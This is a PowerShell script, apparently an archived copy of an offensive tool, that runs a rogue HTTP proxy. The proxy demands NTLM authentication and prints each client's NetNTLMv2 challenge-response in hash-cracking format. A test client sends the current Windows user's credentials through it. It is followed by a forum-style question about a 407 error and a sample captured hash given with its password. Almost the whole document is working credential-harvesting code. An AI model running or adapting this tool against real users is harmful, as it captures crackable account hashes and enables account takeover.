#DISCLAIMER
#I'm not the original author of this script.
#The original git repository has vanished; this copy is kept for reference.
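function String-to-ByteArray ($String)
{
    # Decode a hex string into a byte[], two hex digits per byte
    # ("4e544c" -> 78,84,76). Case-insensitive.
    # Throws ArgumentException on odd length; the old loop ran past the end of the
    # string on the last pair and died inside Substring instead.
    if ($String.Length % 2 -ne 0)
    {
        throw (New-Object System.ArgumentException "hex string must have an even number of digits")
    }
    $ByteArray = New-Object System.Byte[] ($String.Length / 2)
    for ($i = 0; $i -lt $ByteArray.Length; $i++)
    {
        $ByteArray[$i] = [System.Convert]::ToByte($String.Substring($i * 2, 2), 16)
    }
    # Leading comma stops PowerShell from unrolling the array on return, so the
    # caller receives a real byte[] (ToBase64String takes it directly).
    return ,$ByteArray
}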
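function ByteArray-to-String ($ByteArray)
{
    # Hex-encode bytes as upper-case, two digits each ("78 84 76" -> "4E544C").
    # Accepts either a real array of bytes or the space-joined decimal string the
    # caller builds with `[Convert]::FromBase64String(...) -join " "` (the only
    # form the old code handled).
    # $String is initialised explicitly: under PowerShell's dynamic scoping an
    # unset local would otherwise start from a $String variable of the caller.
    $String = ""
    if ($ByteArray -is [System.Array])
    {
        $items = $ByteArray
    }
    else
    {
        $items = ([string]$ByteArray).Split(" ")
    }
    foreach ($Byte in $items)
    {
        $String += "{0:X2}" -f [int]$Byte
    }
    return $String
}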
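function strtohex ($str)
{
    # Hex-encode each char of $str by its code point, upper-case, at least two
    # digits per char ("NO" -> "4E4F"). The old "{0:X}" form emitted a single
    # digit for chars below 0x10, which misaligns the digit pairs hextostr reads.
    # Chars above 0xFF still produce 3-4 digits (not a UTF-16 encoding; use
    # strtonullspacedhex for that).
    $c = ""    # explicit init: an unset local would read the caller's $c (dynamic scoping)
    foreach ($element in $str.ToCharArray())
    {
        $c += "{0:X2}" -f [System.Convert]::ToUInt32($element)
    }
    return $c
}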
function hextostr ($str)
{
    # Decode a hex string two digits at a time, appending each non-zero byte as a
    # char and skipping 0x00 bytes, so the UTF-16LE hex this script feeds it
    # (NTLM user/domain fields) comes back as plain text for chars below 0x100:
    # "74006500" -> "te". Chars above 0xFF are not reconstructed.
    # Odd-length input fails on the final Substring, as before.
    $out = New-Object System.Text.StringBuilder
    $pos = 0
    while ($pos -lt $str.length)
    {
        $value = [convert]::ToInt32($str.substring($pos, 2), 16)
        if ($value -ne 0)
        {
            [void]$out.Append([char]$value)
        }
        $pos += 2
    }
    return $out.ToString()
}
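function strtonullspacedhex ($str)
{
    # UTF-16LE-encode $str and return it as upper-case hex ("NO" -> "4E004F00"),
    # the encoding NTLM uses for TargetName and AV_PAIR values when the UNICODE
    # flag is negotiated. Uses the real encoder: the old per-char "{0:X}" + "00"
    # form dropped the leading zero for chars below 0x10 and emitted chars above
    # 0xFF in the wrong byte order. Output is identical for printable ASCII.
    $bytes = [System.Text.Encoding]::Unicode.GetBytes([string]$str)
    # BitConverter gives "4E-00-4F-00"; strip the dashes.
    return ([System.BitConverter]::ToString($bytes) -replace "-", "")
}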
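function strtohexint ($str,$length)
{
    # Little-endian hex of the integer $str, right-padded with zero bytes to
    # $length hex chars (72, 8 -> "48000000"), the form NTLM uses for offsets.
    # The old version only right-padded, which is correct for values below 0x100
    # but left larger values in big-endian order (0x1234 -> "12340000").
    # Never truncates: if the value needs more than $length chars it is returned whole.
    $big = "{0:X0}" -f $str
    if ($big.Length % 2 -ne 0)
    {
        $big = "0" + $big
    }
    $tmp = ""
    # Walk the big-endian digit pairs from the end to reverse the byte order.
    for ($pos = $big.Length - 2; $pos -ge 0; $pos -= 2)
    {
        $tmp += $big.Substring($pos, 2)
    }
    if ($length - $tmp.Length -gt 0)
    {
        $tmp += "0" * ($length - $tmp.Length)
    }
    return $tmp
}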
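function strlentohexint ($str,$length)
{
    # Byte length of the hex string $str (hex chars / 2) as little-endian hex,
    # right-padded with zero bytes to $length hex chars — the Len/MaxLen form used
    # in NTLM "Fields" structures ("4E004F00", 4 -> "0400").
    # Fixes two things in the old version: lengths of 0x100 bytes or more came out
    # big-endian, and an odd-length $str produced a double that "{0:X0}" cannot
    # format. Never truncates or pads with a negative count.
    $byteCount = [int][math]::Floor($str.Length / 2)
    $big = "{0:X0}" -f $byteCount
    if ($big.Length % 2 -ne 0)
    {
        $big = "0" + $big
    }
    $tmp = ""
    # Reverse the big-endian digit pairs into little-endian order.
    for ($pos = $big.Length - 2; $pos -ge 0; $pos -= 2)
    {
        $tmp += $big.Substring($pos, 2)
    }
    if ($length - $tmp.Length -gt 0)
    {
        $tmp += "0" * ($length - $tmp.Length)
    }
    return $tmp
}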
Function hextoint ($h) {
    # Parse a little-endian hex string into an Int32 ("38000000" -> 0x38 = 56):
    # the digit pairs are collected from the end of the string, joined, and handed
    # to ToInt32. Eight digits with the top bit set come back negative (Int32), as
    # before; odd-length input fails inside Substring on the last iteration.
    $pairs = @()
    for ($k = 0; $k -lt ($h.Length / 2); $k++) {
        $pairs += $h.Substring($h.Length - ($k * 2) - 2, 2)
    }
    Return [convert]::ToInt32(($pairs -join ""), 16)
}
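# ---------------------------------------------------------------------------
# Rogue HTTP proxy. Every request is answered with a 407 demanding NTLM; the
# client's NEGOTIATE_MESSAGE (type 1) gets a fixed CHALLENGE_MESSAGE (type 2),
# and from its AUTHENTICATE_MESSAGE (type 3) the NetNTLMv2 material is printed as
#   user::domain:<server challenge>:<NTProofStr>:<rest of the NTLMv2 blob>
# ---------------------------------------------------------------------------

# 8-byte server challenge as hex. Deliberately static rather than random: the
# printed line must carry the exact challenge the client answered, and a fixed
# value makes every captured line usable without per-connection bookkeeping.
$code = "f132ae278ad7f7a0"
# Response bodies for the 407 challenges and the final 200.
$e = "<html><head>Access Denied</head><body></body></html>"
$e2 = "<html><head></head><body></body></html>"
# Target names advertised in the challenge, UTF-16LE as hex.
$nbdomainname = strtonullspacedhex("NODOMAIN")
$dnsdomainname = strtonullspacedhex("NODOMAIN.COM")
$computername = strtonullspacedhex("NO")
$dnscomputername = strtonullspacedhex("NO.NODOMAIN.COM")
# Their byte lengths as 2-byte little-endian hex (4 hex chars).
$nbdomainnamelen = strlentohexint $nbdomainname 4
$computernamelen = strlentohexint $computername 4
$dnsdomainnamelen = strlentohexint $dnsdomainname 4
$dnscomputernamelen = strlentohexint $dnscomputername 4
# TargetInfo AV_PAIR list, each AvId(2, LE) AvLen(2, LE) Value:
# 0x0002 NbDomainName, 0x0001 NbComputerName, 0x0004 DnsDomainName,
# 0x0003 DnsComputerName, 0x0005 DnsTreeName (reuses the DNS domain), 0x0000 EOL.
$targetinfo = "0200"+$nbdomainnamelen+$nbdomainname+"0100"+$computernamelen+$computername+"0400"+$dnsdomainnamelen+$dnsdomainname+"0300"+$dnscomputernamelen+$dnscomputername+"0500"+$dnsdomainnamelen+$dnsdomainname+"0000"+"0000"
# TargetInfo follows the 0x38-byte fixed header and the TargetName payload.
$t1=hextoint "38000000"
$t2=strlentohexint $nbdomainname 4
$t2=hextoint $t2
$t=($t1+$t2)
$targetinfooffset = strtohexint $t 8
$targetinfolen = strlentohexint $targetinfo 4
# CHALLENGE_MESSAGE: "NTLMSSP\0" | MessageType 2 | TargetNameFields (Len, MaxLen,
# Offset 0x38) | NegotiateFlags 0xE2898295 (LE) | ServerChallenge | 8 reserved
# bytes | TargetInfoFields | 8-byte Version | TargetName | TargetInfo.
$hexcode = "4e544c4d53535000"+"02000000"+$nbdomainnamelen+$nbdomainnamelen+"38000000"+"958289e2"+$code+"0000000000000000"+$targetinfolen+$targetinfolen+$targetinfooffset+"0000000000000000"+$nbdomainname+$targetinfo

$Encoding = new-object system.text.asciiencoding;
$Buffer=new-object system.byte[] 1024;
# Bound to loopback: only processes on this machine can reach the proxy.
$endpoint = new-object System.Net.IPEndPoint ([system.net.ipaddress]::loopback, 8080)
$listener = new-object System.Net.Sockets.TcpListener $endpoint

# Read what the client has sent. The first Read blocks (up to the stream's
# ReadTimeout), so a client that has not written yet right after Accept is waited
# for instead of being dropped — polling DataAvailable straight after Accept, as
# the old loop did, often saw nothing. The loop then drains DataAvailable.
# Returns "" when nothing arrived in time. Uses the script-scope $Buffer/$Encoding.
function Read-ClientRequest ($Stream)
{
    $text = ""
    try
    {
        do
        {
            $n = $Stream.Read($Buffer, 0, $Buffer.Length)
            if ($n -le 0) { break }
            $text += $Encoding.GetString($Buffer, 0, $n)
        } while ($Stream.DataAvailable)
    }
    catch [System.IO.IOException]
    {
        # ReadTimeout elapsed or the peer reset; return whatever was read.
    }
    return $text
}

# Write one HTTP/1.1 response. $extraHeaders is zero or more complete
# "Name: value`r`n" lines placed before Content-Type. Content-Length counts
# chars, which equals bytes for the ASCII bodies used here.
function Write-HttpResponse ($writer, $statusLine, $extraHeaders, $body)
{
    $res = "HTTP/1.1 " + $statusLine + "`r`n" + $extraHeaders + "Content-Type: text/html`r`nContent-Length: " + $body.length.tostring() + "`r`n`r`n" + $body
    $writer.write($res)
    $writer.flush()
}

# Resolve one NTLM "Fields" structure (Len: 2 bytes at byte $lenPos, Offset:
# 4 bytes at byte $offPos, both LE) against the hex-encoded message and return
# the referenced payload as hex. Throws if it points outside the message, where
# the old code fell into Substring with an unchecked offset.
function Get-NtlmField ($hex, $lenPos, $offPos)
{
    $len = hextoint $hex.Substring($lenPos * 2, 2 * 2)
    $off = hextoint $hex.Substring($offPos * 2, 4 * 2)
    if ($len -lt 0 -or $off -lt 0 -or ($off + $len) * 2 -gt $hex.Length)
    {
        throw ("NTLM field at byte " + $offPos + " points outside the message")
    }
    return $hex.Substring($off * 2, $len * 2)
}

# Pull the token out of the first Proxy-Authorization header (last space-separated
# word of that line) and return its bytes as upper-case hex.
function Get-AuthTokenHex ($request)
{
    $line = ($request -split "`r?`n" | Where-Object { $_ -match "Proxy-Authorization" } | Select-Object -First 1)
    $token = ($line -split " ")[-1]
    return (ByteArray-to-String ([System.Convert]::FromBase64String($token) -join " "))
}

$listener.start()
try
{
    while ($true)
    {
        $client = $listener.AcceptTcpClient()
        $Stream = $null
        $writer = $null
        try
        {
            $Stream = $client.GetStream()
            $Stream.ReadTimeout = 10000    # ms; bounds the blocking Read in Read-ClientRequest
            $writer = New-Object System.IO.StreamWriter $Stream
            $Result = Read-ClientRequest $Stream
            if ($Result -ne "")
            {
                $Result
                # Any HTTP request line (CONNECT, GET, POST, ...) gets challenged; the
                # old check reacted to CONNECT and GET only and silently dropped the rest.
                if ($Result -match "^[A-Z]+ \S+ HTTP/")
                {
                    if ($Result -like "*Proxy-Authorization:*")
                    {
                        $b = Get-AuthTokenHex $Result
                        if ($b.Length -lt 12 * 2 -or $b.Substring(0, 8 * 2) -ne "4E544C4D53535000")
                        {
                            # Not a raw NTLMSSP message ("NTLMSSP\0" signature missing). A
                            # SPNEGO-wrapped Negotiate token (ASN.1, starts 0x60) or Kerberos
                            # lands here; it is logged and the connection closed, as before.
                            write-host ("Ignoring non-NTLMSSP Proxy-Authorization token starting " + $b.Substring(0, [math]::Min(16, $b.Length)))
                        }
                        elseif ($b.Substring(8 * 2, 4 * 2) -eq "01000000")
                        {
                            # NEGOTIATE_MESSAGE -> answer with our CHALLENGE_MESSAGE.
                            $challenge = string-to-bytearray $hexcode
                            $challenge = [System.Convert]::ToBase64String($challenge)
                            Write-HttpResponse $writer "407 Proxy Authorization Required" ("Proxy-Authenticate: Negotiate " + $challenge + "`r`n") $e
                        }
                        elseif ($b.Substring(8 * 2, 4 * 2) -eq "03000000")
                        {
                            # AUTHENTICATE_MESSAGE. The three Fields read below end at byte 44:
                            # NtChallengeResponseFields (Len @20, Offset @24), DomainNameFields
                            # (@28/@32), UserNameFields (@36/@40).
                            if ($b.Length -lt 44 * 2)
                            {
                                throw "AUTHENTICATE_MESSAGE shorter than the fields it must carry"
                            }
                            $ntResponse = Get-NtlmField $b 20 24
                            $domain = hextostr (Get-NtlmField $b 28 32)
                            $user = hextostr (Get-NtlmField $b 36 40)
                            if ($ntResponse.Length -lt 16 * 2)
                            {
                                throw "NtChallengeResponse shorter than 16 bytes"
                            }
                            if ($ntResponse.Length -le 24 * 2)
                            {
                                # A 24-byte NT response is NTLMv1, not v2: the line printed
                                # below is then not in NetNTLMv2 format.
                                write-warning "NT response is 24 bytes or less (NTLMv1?); the line below is not a NetNTLMv2 hash"
                            }
                            # NTLMv2 response = NTProofStr (16 bytes) || blob.
                            $NTProofStr = $ntResponse.Substring(0, 16 * 2)
                            $NTLMresponse = $ntResponse.Substring(16 * 2)
                            write-host ""
                            write-host ""
                            write-host "${user}::${domain}:${code}:${NTProofStr}:${NTLMresponse}"
                            write-host ""
                            write-host ""
                            Write-HttpResponse $writer "200 OK" "" $e2
                        }
                        else
                        {
                            write-host ("Ignoring NTLMSSP message type " + $b.Substring(8 * 2, 4 * 2))
                        }
                    }
                    else
                    {
                        # No credentials yet: demand them.
                        Write-HttpResponse $writer "407 Proxy Authorization Required" "Proxy-Authenticate: Negotiate`r`nProxy-Authenticate: NTLM`r`n" $e
                    }
                }
            }
        }
        catch
        {
            # A malformed header or token (bad base64, truncated message) must not
            # take the listener down; the old code left the exception unhandled.
            write-warning ("Dropping client: " + $_.Exception.Message)
        }
        finally
        {
            # Always release the connection, also on the error path.
            if ($writer -ne $null) { $writer.Dispose() }
            if ($Stream -ne $null) { $Stream.Dispose() }
            $client.Dispose()
        }
    }
}
finally
{
    $listener.stop()
}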
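# Test client: send one request through the rogue proxy on 127.0.0.1:8080 with
# the current user's Windows credentials, so the server side receives an NTLM
# authenticate message to print. UseDefaultCredentials is what makes .NET answer
# the proxy's 407 with the logged-on user's credentials — only point this at a
# proxy you control.
$wc = New-Object System.Net.WebClient
try
{
    # Second argument ($true) bypasses the proxy for local/intranet addresses;
    # the target below is not local, so it goes through the proxy.
    $WebProxy = New-Object System.Net.WebProxy("http://127.0.0.1:8080",$true)
    $WebProxy.UseDefaultCredentials = $true
    $wc.Proxy = $WebProxy
    $wc.DownloadString("http://www.google.com")
}
finally
{
    # WebClient is IDisposable; the original never released it.
    $wc.Dispose()
}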
I have a problem when it comes to DownloadString in your client:
Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (407) Proxy Authentication Required."
At line:1 char:1
Would you happen to know the reason behind this? I tried adding "user-agent" in the header of your client code, but it didn't work.
Thanks a bunch!
Sample NetNTLMv2 line captured; the account's password was p@ssw0rd:
test::LAB:f132ae278ad7f7a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